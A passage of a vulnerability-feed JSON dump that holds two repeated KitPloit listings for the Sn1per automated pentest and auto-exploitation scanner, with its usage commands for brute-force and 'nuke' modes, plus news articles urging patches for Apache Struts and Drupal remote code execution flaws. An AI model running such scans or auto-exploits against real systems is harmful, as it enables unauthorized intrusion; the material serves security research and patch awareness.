scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-07-05T13:45:00", "type": "kitploit", "title": "Sn1per v5.0 - Automated Pentest Recon Scanner", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-07-05T13:45:01", "id": "KITPLOIT:7835941952769002973", "href": "http://www.kitploit.com/2018/07/sn1per-v50-automated-pentest-recon.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-05T20:50:06", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-11-24T12:43:00", "type": "kitploit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-11-24T12:43:00", "id": "KITPLOIT:8672599587089685905", "href": "http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:40:18", "description": "[](<https://thehackernews.com/images/-ktDJMSI6Gdo/W310Im7Od5I/AAAAAAAAx8k/iNNQd5VURi8zRV8-MZosbkEo-V4eXjqowCLcBGAs/s728-e100/apache-struts-vulnerability-hacking.png>)\n\nSemmle security researcher Man Yue Mo has [disclosed](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>) a critical remote code execution vulnerability in the popular Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers. \n \nApache Struts is an open source framework for developing web applications in the Java programming language and is widely used by enterprises globally, including by 65 percent of the Fortune 100 companies, like Vodafone, Lockheed Martin, Virgin Atlantic, and the IRS. \n \nThe vulnerability (**CVE-2018-11776**) resides in the core of Apache Struts and originates because of insufficient validation of user-provided untrusted inputs in the core of the Struts framework under certain configurations. \n \nThe newly found Apache Struts exploit can be triggered just by visiting a specially crafted URL on the affected web server, allowing attackers to execute malicious code and eventually take complete control over the targeted server running the vulnerable application. \n \n\n\n## Struts2 Vulnerability - Are You Affected?\n\n \nAll applications that use Apache Struts\u2014supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) and even some unsupported Apache Struts versions\u2014are potentially vulnerable to this flaw, even when no additional plugins have been enabled. \n \n\n\n> \"This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\" Yue Mo said.\n\n \nYour Apache Struts implementation is vulnerable to the reported RCE flaw if it meets the following conditions: \n\n\n * The **alwaysSelectFullNamespace** flag is set to true in the Struts configuration.\n * Struts configuration file contains an \"action\" or \"url\" tag that does not specify the optional namespace attribute or specifies a wildcard namespace.\nAccording to the researcher, even if an application is currently not vulnerable, \"an inadvertent change to a Struts configuration file may render the application vulnerable in the future.\" \n \n\n\n## Here's Why You Should Take Apache Struts Exploit Seriously\n\n \nLess than a year ago, credit rating agency Equifax exposed [personal details of its 147 million consumers](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) due to their failure of patching a similar [Apache Struts flaw](<https://thehackernews.com/2017/03/apache-struts-framework.html>) that was disclosed earlier that year (CVE-2017-5638). \n \nThe Equifax breach cost the company over $600 million in losses. \n\n\n> \"Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\" said Pavel Avgustinov, Co-founder & VP of QL Engineering at Semmle.\n\n> \"A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system.\"\n\n \n\n\n## Patch Released for Critical Apache Struts Bug\n\n[](<https://thehackernews.com/images/-aZ6JnELsib4/W31pGhAz6bI/AAAAAAAAx8M/0d3umSPy5YATSc8sNXCx5cKejhIftncEgCLcBGAs/s728-e100/apache-struts-vulnerability-exploit.png>)\n\nApache Struts has fixed the vulnerability with the release of Struts versions 2.3.35 and 2.5.17. Organizations and developers who use Apache Struts are urgently advised to upgrade their Struts components as soon as possible. \n \nWe have seen how previous disclosures of similar critical flaws in Apache Struts have resulted in [PoC exploits](<https://thehackernews.com/2017/03/apache-struts-framework.html>) being published within a day, and exploitation of the [vulnerability in the wild](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>), putting critical infrastructure as well as customers' data at risk. \n \nTherefore, users and administrators are strongly advised to upgrade their Apache Struts components to the latest versions, even if they believe their configuration is not vulnerable right now. \n \nThis is not the first time the Semmle Security Research Team has reported a critical RCE flaw in Apache Struts. Less than a year ago, the team disclosed a similar [remote code execution vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) (CVE-2017-9805) in Apache Struts. \n \n\n\n## UPDATE \u2014 Apache Struts RCE Exploit PoC Released\n\n[](<https://thehackernews.com/images/-fNjQzu1b7iw/W376YS-nYjI/AAAAAAAAx9I/T7MopN2IxtwTxicu4k8j55ywy0GbIRQHgCLcBGAs/s728-e100/apache-struts-exploit-poc-rce-vulnerability.png>)\n\nA security researcher has today released [a PoC exploit](<https://github.com/jas502n/St2-057/blob/master/README.md>) for the newly discovered remote code execution (RCE) vulnerability (CVE-2018-11776) in Apache Struts web application framework.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-22T14:04:00", "type": "thn", "title": "New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T18:30:56", "id": "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "href": "https://thehackernews.com/2018/08/apache-struts-vulnerability.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:35", "description": "[](<https://thehackernews.com/images/-nI78JCGBjaE/WuCp9Z3ptKI/AAAAAAAAwcQ/XnP5D9Is0Z4NbW1Yo0LuebQ2_RxM9oa9QCLcBGAs/s728-e100/drupal-patch-update.png>)\n\nDamn! You have to update your Drupal websites. \n \nYes, of course once again\u2014literally it's the third time in last 30 days. \n \nAs [notified](<https://www.drupal.org/psa-2018-003>) in advance two days back, Drupal has now released new versions of its software to patch yet another critical remote code execution (RCE) vulnerability, affecting its Drupal 7 and 8 core. \n \nDrupal is a popular open-source content management system software that powers millions of websites, and unfortunately, the CMS has been under active attacks since after the disclosure of a highly critical remote code execution vulnerability. \n \nThe new vulnerability was discovered while exploring the previously disclosed RCE vulnerability, dubbed **[Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>)** (CVE-2018-7600) that was patched on March 28, forcing the Drupal team to release this follow-up patch update. \n \nAccording to a new [advisory](<https://www.drupal.org/sa-core-2018-004>) released by the team, the new remote code execution vulnerability (CVE-2018-7602) could also allow attackers to take over vulnerable websites completely. \n \n\n\n### How to Patch Drupal Vulnerability\n\n[](<https://thehackernews.com/images/-zI_GNj80adw/WuC42gTf-5I/AAAAAAAAwcg/BiiIUAQK33MSqQwCkvfkyFi1l0BAq_wpACLcBGAs/s728-e100/drupal.png>)\n\n \nSince the previously disclosed flaw derived much attention and motivated attackers to target websites running over Drupal, the company has urged all website administrators to install new security patches as soon as possible. \n\n\n * If you are running 7.x, upgrade to Drupal 7.59.\n * If you are running 8.5.x, upgrade to Drupal 8.5.3.\n * If you are running 8.4.x, which is no longer supported, you need first to update your site to 8.4.8 release and then install the latest 8.5.3 release as soon as possible.\nIt should also be noted that the new patches will only work if your site has already applied patches for Drupalgeddon2 flaw. \n\n\n> \"We are not aware of any active exploits in the wild for the new vulnerability,\" a drupal spokesperson told The Hacker News. \"Moreover, the new flaw is more complex to string together into an exploit.\"\n\nTechnical details of the flaw, can be named **Drupalgeddon3**, have not been released in the advisory, but that does not mean you can wait until next morning to update your website, believing it won't be attacked. \n \nWe have seen how attackers developed [automated exploits](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) leveraging Drupalgeddon2 vulnerability to [inject cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware into websites, within few hours after it's detailed went public. \n \nBesides these two flaws, the team also patched a moderately critical [cross-site scripting (XSS) vulnerability](<https://thehackernews.com/2018/04/drupal-site-vulnerability.html>) last week, which could have allowed remote attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft. \n \nTherefore, Drupal website admins are highly recommended to update their websites as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-25T16:41:00", "type": "thn", "title": "Third Critical Drupal Flaw Discovered\u2014Patch Your Sites Immediately", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-04-26T11:04:51", "id": "THN:8E5D44939B2B2FF0156F7FF2D4802857", "href": "https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:36", "description": "[](<https://thehackernews.com/images/-zMSVUp45Ep4/WtcTP9bdJsI/AAAAAAAAwTg/e-HDb99w0307p9aEkp1TPTePjTvSe7JRQCLcBGAs/s728-e100/drupalgeddon-exploit.png>)\n\nThe Drupal vulnerability (CVE-2018-7600), dubbed [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners. \n \nDrupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the company without releasing its technical details. \n \nHowever, just a day after security researchers at Check Point and Dofinity published complete details, a Drupalgeddon2 proof-of-concept (PoC) [exploit code](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) was made widely available, and large-scale Internet scanning and exploitation attempts followed. \n \nAt the time, no incident of targets being hacked was reported, but over the weekend, several security firms noticed that attackers have now started exploiting the vulnerability to install cryptocurrency miner and other malware on vulnerable websites. \n \nThe SANS Internet Storm Center [spotted](<https://isc.sans.edu/forums/diary/A+Review+of+Recent+Drupal+Attacks+CVE20187600/23563/>) some attacks to deliver a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl. \n\n\n[](<https://thehackernews.com/images/-cgGXAVXKeKc/WtcOhdYr0iI/AAAAAAAAwTQ/gXhXTplYR4oUU-jDAmOdEpSV_ZIIDPweACLcBGAs/s728-e100/drupal-website-hacking.png>)\n\nThe simple PHP backdoor allows attackers to upload additional files (backdoors) to the targeted server. \n \nA thread on SANS ISC Infosec forums also [suggests](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>) that Drupalgeddon2 is being used to install the XMRig Monero miner on vulnerable websites. Besides the actual XMRig miner, the malicious script also downloads additional files, including a script to kill competing miners on the targeted system. \n \nResearchers from security firm Volexity have also [observed](<https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/>) a wide variety of actions and payloads attempted via the public exploit for Drupalgeddon2 to deliver malicious scripts that install backdoors and cryptocurrency miners on the vulnerable sites. \n \nThe researchers believed that one of the Monero miner campaigns, delivering XMRig, is associated with a criminal group that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miner malware shortly after its PoC exploit code was made public in late 2017. \n\n\n[](<https://thehackernews.com/images/-cWUncg7VBfo/WtcN9yL7mTI/AAAAAAAAwTI/--A-g7ptWeIueY8TO5tvLWL1aijI9OAjgCLcBGAs/s728-e100/drupal-hacking.png>)\n\nVolexity identified some of the group's wallets that had stored a total of 544.74 XMR (Monero coin), which is equivalent to almost $105,567. \n \nAs we reported in our previous article, Imperva stats [showed](<https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/>) that 90% of the Drupalgeddon2 attacks are simply IP scanning in an attempt to find vulnerable systems, 3% are backdoor infection attempts, and 2% are attempting to run crypto miners on the targets. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations under the privileges of the user, affecting all versions of Drupal from 6 to 8. \n \nTherefore, site admins were highly recommended to patch the issue by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible. \n\n\n> In its advisory, Drupal [warned](<https://www.drupal.org/psa-2018-002>) that \"sites not patched by Wednesday, 2018-04-11 may be compromised\" and \"simply updating Drupal will not remove backdoors or fix compromised sites.\"\n\nMoreover, \n\n\n> \"If you find that your site is already patched, but you didn't do it, that can be a symptom that the site was compromised. Some 